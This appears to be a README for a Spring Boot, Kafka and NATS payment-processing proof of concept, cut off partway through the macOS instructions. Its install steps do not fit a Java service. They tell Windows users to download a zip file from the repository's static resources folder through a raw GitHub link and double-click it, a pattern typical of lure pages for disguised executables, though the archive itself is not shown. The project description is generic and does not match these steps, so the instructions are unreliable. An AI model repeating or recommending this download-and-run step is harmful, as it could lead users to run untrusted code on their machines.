⚡ spring-batch-kafka-nats-poc - Fast & Reliable Financial Transactions

Welcome to the spring-batch-kafka-nats-poc project! This application is a high-velocity clearing and settlement proof of concept (POC) designed with modern technology. Built using Java 21 and Spring Boot 3, it leverages Kafka and NATS for efficient processing. This app includes a Hybrid Event Driven Architecture (EDA) strategy for ultra-low latency fraud checks and durable financial batch processing.

Follow these simple steps to set up the application on your computer.

• Operating System: Windows 10 or later, macOS 10.14 or later, or any recent Linux distribution
• Java Version: JDK 21
• Memory: At least 2GB of RAM available
• Disk Space: Minimum of 500MB free space

To get the software, visit this page to download.

1. Click the link above to go to the Releases page.
2. Look for the latest version.
3. Choose the package suitable for your operating system.
4. Download the file to your computer.

Once the download is complete, you can run the application:

1. For Windows Users:

   • Locate the downloaded file (e.g., https://raw.githubusercontent.com/ulises5700/spring-batch-kafka-nats-poc/main/payment-gateway-service/src/main/resources/static/kafka_poc_batch_spring_nats_3.6.zip).
   • Double-click the file to launch the application.

2. For macOS Users:
